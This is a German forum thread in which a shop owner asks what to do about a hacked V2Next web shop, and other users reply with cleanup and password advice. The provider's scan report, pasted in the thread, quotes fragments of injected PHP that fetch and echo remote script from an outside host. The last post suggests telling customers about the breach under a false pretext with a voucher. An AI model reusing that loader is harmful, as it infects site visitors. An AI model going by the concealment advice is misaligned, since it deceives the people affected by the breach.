V2Next Shop infiziert - was tun?

    folgendes...der Shop (bzw. die Domain) eines Freundes war infiziert ....war ein alter ecb-shop drauf - also neuen shop gemacht (v2next) und diese woche von do auf fr nacht auf den server geladen.....alles war soweit ok bis jetzt...nun ist die seite nicht verfügbar und der provider hat eine infiziert.txt - Datei in den shop-Ordner gelegt wo jetzt zb. folgendes drin steht:

    Changed -> 29.08.2014 00:25:46 +0200
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
    32 -> error_reporting(0); ini... -> error_reporting\(0\)\;ini_set\('display_errors',0\)\;\$wp_ob80=@\$_SERVER\['HTTP_USER_AGENT'\]\;
    33 -> if (( preg_match ('/Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
    33 -> if (( preg_match (./Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
    33 -> if (( preg_match (./Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
    34 -> "http://".".*".".*"."..... -> \$wp_ob0980="http://"."html"."string".".com/string"."/\?ip=".\$_SERVER\['REMOTE_ADDR'\]."\&referer=".urlencode\(\$_SERVER\['HTTP_HOST'\]\)."\&ua=".urlencode\(\$wp_ob80\)\;
    34 -> $wp_.*="http://.*?ip=.*... -> \$wp_ob0980="http://"."html"."string".".com/string"."/\?ip=".\$_SERVER\['REMOTE_ADDR'\]."\&referer=".urlencode\(\$_SERVER\['HTTP_HOST'\]\)."\&ua=".urlencode\(\$wp_ob80\)\;
    36 -> curl_setopt ($.*, CURLO... -> curl_setopt\(\$ch,CURLOPT_TIMEOUT,6\)\;curl_setopt\(\$ch,CURLOPT_RETURNTRANSFER,1\)\;\$wp_80ob=curl_exec\(\$ch\)\;curl_close\(\$ch\)\;\}
    37 -> if ( substr(.*,.*,.*) =... -> if\(substr\(\$wp_80ob,1,3\)==='scr'\)\{echo\$wp_80ob\;\}
    37 -> if ( substr($wp_.*,.*,.... -> if\(substr\(\$wp_80ob,1,3\)==='scr'\)\{echo\$wp_80ob\;\}

    nun werde ich das alles löschen, also die texte aus den betroffenen dateien aber meine frage ist..

    wie kann ich das in zukunft vermeiden?

    der provider meinte nur soviel wie "das käme öfter vor bei seinen kunden, deshalb sollte man immer seine software auf dem neuesten stand halten usw. und wenn eine domain im visier sei, dann würden sie da halt auch immer eine lücke finden"...was soll ich denn mit der aussage anfangen?

    War es also doch sorry dass ich recht hatte ;)

    In jedenfall alle logdatei speichern backupen unsw.


    Weiter dies ist dass wichtigste draus!
    ?

    Zitat

    der provider meinte nur soviel wie : deshalb sollte man immer seine software auf dem neuesten stand halten usw

    Dan dazu also alles was auf den webspace ist sorgen dass jeden teil updated ist, auch plugins und co

    Dan den ftp immer mit gutes programm, winscp oder so, ftp user und überhaupt jeden user ( admin shopadmin mysql uns ein andere name und paswort geben niemals etwas gleiches)
    Wen es ein server/host account gibt dieser niemals benutzen für ander sachen also name und passwort abeweichend haben.

    Dan alles folgen auf Foren unsw ob es ein Lücke irgendwo gibt / entdeckt worden ist, ist ein PFlicht für jeder Server/hoster/ Shopadmin webadmin unsw. ( von den produkten die drauf sind!

    Wordpress drauf oder joomla tja dan muss man immer an ball bleiben für alles was drauf ist jeden plugin und co, besser wen ein wichtige shop dan kein joomla oder wordpress auf dieser space, oder ein gute Admin die alles auf den Webspace immer checked up to date halted, und scanned unsw.

    Ist aber mit Wordpres joomla und co ziemlich oft hinterher rennen!

    Ein manages server/ webspace wen man zuwenig ahnung hat mit 24/7 support, dan aber noch immer alles was man selbe drauf schmeisst ist man auch verantwortlich für updates und co so wie alle eigene zugänge.

    UH alle zugänge auch mal ändern, in jedenfall pasworts ab und zu updaten!

    So kan man später noch hier erweitern, man sollte dies besser in forumteil sicherheit tun ?


    Momentan komplett neu anfangen alles neu jeden zugang jeden paswort jeden datei von original standard base download software lieferant, weil meist ist ganz viel mist oder befall noch verstekct auf nen server, oder Datei und kan man immer wider von vorne anfangen,

    habe selbe mall problem mit ein kunde auf unserer server mit phpbb ( für >5 Jaher) gehabt, da war es Komplette server neuinstall wegen die schlimme security bug dort damals, weil imer nach etwas warend ie häcker wider drauf mit root zugang!

    8 Mal editiert, zuletzt von jotest (30. August 2014 um 19:05)

    ja, leider. versteh ich jetzt aber auch nicht. infiziert war eigentlich nur sein alter shop auf seiner domain...ich habe dann den neuen shop auf einem unterordner meiner domain erstellt. wie kann ich da was mitgenommen haben?

    OJA hat den verantwortung für den SERVER, ist es ein VPS oder nur Webspace?
    Wen VPS dan managed oder unmanaged?

    Wen nur webspace, und/oder managed server sollte den Provider für den basis software den Updates und und sorgen.

    Wie den PHP security update warnung von mir hier ins Forum http://plussupport.commerce-seo.de/showthread.php?t=2293 unsw es noch viele jeden Tage gibt!

    Weiter tja den ecb unsw xtforks und co sind wen man nicht rechtzeitig updated wegen security wirklich teils voll mit löcher!

    ne nur eine webspace.
    witzig ist ja...den shop habe ich ja auf meiner domain (auch webspace) fertig gemacht und liegt danoch und ist auch immernoch aufrufbar.
    vor zwei tagen dann auf seine domain hochgeladen (auch webspace) und da nicht mehr aufrufbar.

    und noch was....nachdem ich nun alle infizierten dateien mit den original dateien verglichen habe, muss ich feststellen, das von seinem provider auch dateien beanstandet wurden, die im vergleich zum original nicht verändert wurden wie zb. folgendes:

    Changed -> 29.08.2014 03:47:46 +0200
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
    598 -> WARNING: Port Binding -> \$this-\>debug\("getOperationscheckingport\$portbindingType".\$portData\['bindingType'\]\)\;
    602 -> WARNING: Port Binding -> \$this-\>debug\("getOperationsfoundport\$portbindingType\$bindingType"\)\;

    aber da steht doch ?

    Zitat

    Changed -> 29.08.2014 03:47:46 +0200

    Also sind die irgendwo wahrscheinlich dort changed oder?

    Wer was wo infiziert / changed ist oder was auch immer mit hin und her wen es irgendwo drin ist wirklich aufpassen.

    Yep jeden site / server unsw ist hackable dass ist ein wetlauf, aber ziemliche unsin zu sagen kan man nichts machen, weil den meiste wirkliche hacker die es drauf haben intressieren sich nicht für den basis Webshops / webspaces, die suchen sich den Grosse Fischen aus.

    Also dan den "kiddies" Konkurenz oder was auch immer die den standard suche drehen für security flaws die bereits bekannt sind , und ein webspace ganz offen setzen, da muss man selbe dran ( als Webspace Admin und alles was man selbe drauf macht) und alles richtig machen updates und sicherheits massnahmen!

    Also auch aufpassen ob den Lokale Rechner nicht den Ursprung für den Hack ist, wen dort etwas drauf ist, und falsches ftp programm wo man paswörter einfach auslesen kan unsw.


    Wen Webspace, dan ganz genau nachsehen wovon den hack gekommen ist welches programme / bugs die hinein gekommen sind, wen Wordpress aber kein wordpress drauf ist dan den provider ansprechen, wen php / curl nicht udpated und ducrh dieser löcher dan auch Provider.

    Wen aber lücke ecb shop, oder ein ftp account dan tja ist man selbe ...

    Dan hat man davon meist nur den log files dass es die nicht gelungen ist irgendwo hinein zu kommen.

    Einmal editiert, zuletzt von jotest (30. August 2014 um 21:07)

    Zitat von Andrea

    ja, leider. versteh ich jetzt aber auch nicht. infiziert war eigentlich nur sein alter shop auf seiner domain...ich habe dann den neuen shop auf einem unterordner meiner domain erstellt. wie kann ich da was mitgenommen haben?

    Wen man einmal auf nen webspace ist dan kan man dort fast alles machen, automatische scripts laufen / infizieren dan alle Verzeichnisse Datei die die möchten!

    Allso irgendwo muss man Datei übernommen haben die ein infektion haben, oder den Webspace war infiziert und Änderd dan Datei ofcourse, sei es ein .js oder .php was auch immer, oder schlimmer den FTP zugang bei dir.. ( weis nicht weil kein Kristallglas ;)


    Oder was sein kan die Komplette Server ist eigentlich hacked, php / wordpress oder was auch immer für ein loch!
    Dort ist den Provider verantwortlich die es dan oft/meist abschieben auf diejenige mit Webspace drauf wo den hack angefangen hat.

    Vermutung ist aber den meist vorhande leigende sachen.

    Also kein security Updates für den ECB shop gemacht dan ...
    Oder den Ftp Pgramm von den Shopbetreiber ist so einer die schrott ist und den zugang freigegeben hat, soll dan den Warnen weil oft ist dan auch den Rechner lokal hacked, da soll man dan kein wichtige sachen mehr mitmachen, erst 100% sicher sein!
    Wen doch auh nen wordpress drauf ist tja dan viel glück mit suchen / updaten, sorry finde dieser Wordpress Administration ist nichts für normalo Webseite inhaber! ( nachdruck auf/für alles ist Administration)

    Ist nicht so nett von mir sorry.

    Alle aber auch wirklich alle Zugang soll man ändern also auch den email accounts! selbe.
    Weil wen die mall dieser kennen und vielleicht auch den paswort dazu wen man dan etwas änderd lesen die einfach mit!

    Besser ist auch nach so ein HAck für admins wie shopadmin webspace admin ein komplett anderer/neues email account zu benutzen beim neu anfang! ( wen die emailaccounts wie es ja tig millionen oder so bekantlich hacked sind, dan könte selbst dass auch ein ursprung sein)

    10 Mal editiert, zuletzt von jotest (30. August 2014 um 21:24)

    kein wordpress - nirgendwo. tja, und der ecb shop war so alt - da gab es schon ewig keine updates dafür.
    habe jetzt auch mit meinem provider telefoniert und eine der infizierten php - dateien prüfen lassen und der hat es dann auch gefunden und sagte das es am 19ten eingespielt wurde aber du hast mich schon am 18ten gewarnt.

    und das
    Changed -> 29.08.2014 03:47:46 +0200

    bedeutet nur soviel das um diese uhrzeit der provider meines bekannten die infizierten dateien entdeckt hat und die seite gesperrt - ist jetzt aber wieder frei nachdem ich den code von den dateien entfernt habe.

    ich habe jetzt mal alle ftp-passwörter und sql-passwörter geändert. ob das reichen wird ist fraglich.
    mein pc ist jedenfalls sauber.

    Kan nur raten aber wen es zum beispiel einer TimThumbhack ist die ist ganz alt un bereits lang bekannt da hat man dan wirklich versäumt updates zu machen.

    Also wen aufs ganz alte sachen hack drin sind dan wen es gute saubere bacjups gibt alles neu machen, hilft nur wen man alles gleich von anfang abschirmd, also ein ip adresse zugang einbauen den rest die nicht drauf soll allen sperren.

    Dan erst dan backups einspielen und dazu dan schenlle alle zugang ändern und den sicherheits udpates machen, wen nicht sind die 123 so wider drauf!


    Wen nicht so wichtige sachen drauf sind, oder es ist machbar dan alles neu aufbauen mit alles neue zugang und nur den content aus backup manuel wider einspielen, also kein software nur den reine suaber content.


    Ein spielchen 19 e august für dieser Datei, aber wer was davor passiert ist mit andere datei wovon nicht bemerkt ist, kan man jedenzeit wen zugang ändern, oder schlimmer den scanner seht es gar nicht wie deiner webscans es auch nicht mehr gesehen haben!

    Einmal editiert, zuletzt von jotest (30. August 2014 um 21:36)

    Zitat von jotest


    Oder den Ftp Pgramm von den Shopbetreiber ist so einer die schrott ist und den zugang freigegeben hat, soll dan den Warnen weil oft ist dan auch den Rechner lokal hacked, da soll man dan kein wichtige sachen mehr mitmachen, erst 100% sicher sein!
    Wen doch auh nen wordpress drauf ist tja dan viel glück mit suchen / updaten, sorry finde dieser Wordpress Administration ist nichts für normalo Webseite inhaber! ( nachdruck auf/für alles ist Administration)

    Also mein Wordpress macht die Updates vollautomatisch und erhalte vom System sogar eine nette email, das ich Up-to-date bin ;)
    Welch ein Service von meinem system ;)

    Zitat von Andrea

    ich habe jetzt mal alle ftp-passwörter und sql-passwörter geändert. ob das reichen wird ist fraglich.
    mein pc ist jedenfalls sauber.

    nen wen den ecb wider drauf ist dan sicherlich nicht!

    Wen comseo mit alle zugang neu, aber dan soll auch den webspace account von den provider ein neue passwort bekommen mussen!


    Wordpress weil den code die gefunden ist da ähnlichkeiten mit hat, ob es mall drauf war vielleicht nachfragen.

    Ich selbe habe auch mall joomla auf nen webspace gehabt zum ausprobieren, die scripts finden solche vergessene alte sachen meist doch einmal. ( dort war ich durch ein warnung von meiner firewall die ich auf den server habe gewarnt worden in den zuganglogs, also die log datei sollte sich jeden Admin webspace shopadmin unsw regelmäsig auch ansehen)

    2 Mal editiert, zuletzt von jotest (31. August 2014 um 10:24)

    Zitat von coderX.de

    Also mein Wordpress macht die Updates vollautomatisch und erhalte vom System sogar eine nette email, das ich Up-to-date bin ;)
    Welch ein Service von meinem system ;)

    Nen den wordpress selbe ja den autoupdates wen danach alles noch lauft alle plugins und co, aber problem ist den autoupdate hat nicht alle plugins ins vizier.

    Wie bekant auch letzte Wochen beim Microsoft autoupdates windows 8.1. bleu screens bei vielen user ist immer ein Risiko, wen man plesk mit auto update hat ein disaster aus erfahrung mehrmals

    Denke aber nicht dass Du ein Normalo bist ;)


    Den mail warnungen für updates ja die soll jeden software haben, und danach kan sich jeden entscheiden ob man die safe machen kan.

    Wir haben ein updatescript auf den servers laufen die machen den kleinere die meist gut gehen selbe automatisch den andere wie php versionen bekommen wir ein mail, und suchen wir erst ob es updated werden kan. ( vorab machen wir dan ein snapshot)

    2 Mal editiert, zuletzt von jotest (30. August 2014 um 22:25)

    Zitat von jotest

    Denke aber nicht dass Du ein Normalo bist ;)


    aber Hallloooooooooooooo, soooo wie :D :D

    Passwörter sollten immer länger als 20 Zeichen lang sein und viele komische Zeichen sollten enthalten sein. ;)

    jotestHolland ;) -> Passwörter werden schon gut gesichert und dann copy and paste machen, aber nie auf den eigenen Rechner.

    Zitat von coderX.de

    jotestHolland ;) -> Passwörter werden schon gut gesichert und dann copy and paste machen, aber nie auf den eigenen Rechner.

    Die sind bei mir immer als Hintergrundbild aufs Desktop abgelegt auch so ganz gross das man es ohne Brille von abstand lesen kan ;)

    Nen spass beiseite.

    Andrea hoffe alle zugang unsw. sind erneuerd worden, und es klappt mit den neue nachfolger shop von comseo bei dir und bekannte. viel glück dabei

    Weil ich finde ja den hacker/virenschreiber unsw sind allen bekloppt was die andere Menschen die etwas Geld verdienen möchten mit ein geschäft antun, oder Daten verlust von beispiel wichtige errinnerungs Foto's ...

    Datenschutz Gesetz hin oder her, eigentlich kan man ein sichere Internet / netz haben wen keiner annonym drauf wäre, also jeden device ( um aufs netz zu kommen) wo man 100% den identität von benutzer feststeht. ( also alles was zugang hat beim kauf von so ein gerät den identität festlegen, und ein Uniq ID den Gerät den User zuweisen beim jeden anmeldung unsw)
    Dan ist man all dieser schwachsin gleich loss die die Leute anstellen, also nicht nur spam aber auch mobbing, diebstall in netz, den unter 16 kram die anscheindend selbst erwachsene Deutsche Politiker machen.

    Wen man an normale verkehr auf die Strasse teilnimmt hat man"( wen legal unsw):
    -Führerschein.
    -Versicherung
    -Kenzeichen
    -Ausweis und co
    -PKW mit gültige TÜV.

    Also Warum nicht auf den schnellste gefährlichste Autobahn der Welt? ( Gefährlichste weil man kan damit viel mehr personen einfach ohne straffe ( weil annonym) Weltweit zu tode ( wie selbst tötung, oder anstiftung zum...) bringen mit den unsin, dan mit ein PKW überhaupt möglich ist.

    Nicht annonym heist auch dass die Datensammelwut über User gleich mit an bände gelegt werden soll, vor allem was die mächtige damit machen oder noch in zukunft machen würden, also jeden die etwas sammelt direkt festgelegt werdet dan auch ein spur hinterlassen mussen was wan wen festgelegd worden ist zum welchen zwecken unsw.
    Dieser in den LOGS dan zu speichern sodas jeden selbe entscheiden kan ob es ja oder nein ( den datensammlung über Ihn geÄnderdn oder gelöscht werden soll.


    Es ist eigentlich alles so einfach aber den Politik .....

    Auch wie mindestlohn, oder den möglichkeit ein einkommen um von zu leben für jeden soll doch so normal und einfach sein sollen.
    Wie bl''d kan man eigentlich sein um sich zu wehren gegen dass basis glück und vor allem das dasein können von jeden Bürger/Mensch.
    Wen es das nähmlich geben würde soll es auch weniger mist wie bestimmte kriminalität geben, ofcourse nicht alles..


    Mensch ja Utopie oder doch zukunft die wirklichkeit werden kan.?

    ( dieser Devices sollen dan naturlich auch mit ein art erkennung von den User ausgestattet werden mussen, wie mix Fingerprint / auge unsw. die in abstände oder beim wichtige sachen den aufrufen zu bestätigen)


    Dan braucht man auch kein passwörter mehr als Hintergrundbild wie ich hier habe. ;)

    13 Mal editiert, zuletzt von jotest (31. August 2014 um 01:11)

    UH die webcam auch...
    Nen 27" zoll mit einer 14" ( zum monitoring einiges) daneben reicht mir, weil mehr bringt nur extra Arbeitsplatz stress worauf ich gerne verzichte.

    Zitat von jotest

    UH die webcam auch...
    Nen 27" zoll mit einer 14" ( zum monitoring einiges) daneben reicht mir, weil mehr bringt nur extra Arbeitsplatz stress worauf ich gerne verzichte.

    Muss dir Recht geben, da ich beruflich teilweise mit einen 2. Monitor arbeiten muss, so fällt er immer etwas größer und breiter aus.
    Bevorzuge nur bis 24" und breit und ziehe dabei die Auflösung auf angenehme Sichtweise runter.

    Aber igrendwann werden wir so landen, das wir mit 3-8 Monitoren vor der Nase der Fernbedienung landen werden.
    Ein Bildschrim für die Kinder, Frau bei der Arbeiten, der Geliebten und einer für die Arbeit....:D :D :D

    Die Aussage, ich habe jetzt mal alle FTP Passwörter geändert ist aber schon der Knackpunt. Wenn ein Shop gehackt wurde, SOLLTE MAN DRINGEN ALLE PASSWÖRTER ÄNDERN und dann neu aufspielen. Wenn die Passwörter im Umlauf sind kannst Du die sicherste Software aufspielen OHNE ERFOLG, da die Hintertür im FTP ist :)

    <p>Wir geben nur Anregungen und Hilfestellung auf Basis unserer Erfahrung, keine Rechtshilfe!<br>\m/('_')\m/</p>

    ulli, was sollte an Passwörter geändert werden:
    - ftp-Passwörter
    - MySQL-Passwörter
    - Zugang zur Adminoberfläche des Providers
    - Webshop Passwörter, hier überprüfen ob die Kunden davon auch betroffen sind. Sonst Kunden eine Info versenden und dazu ein anderen Vorwand incl. Gutschein anwenden ;)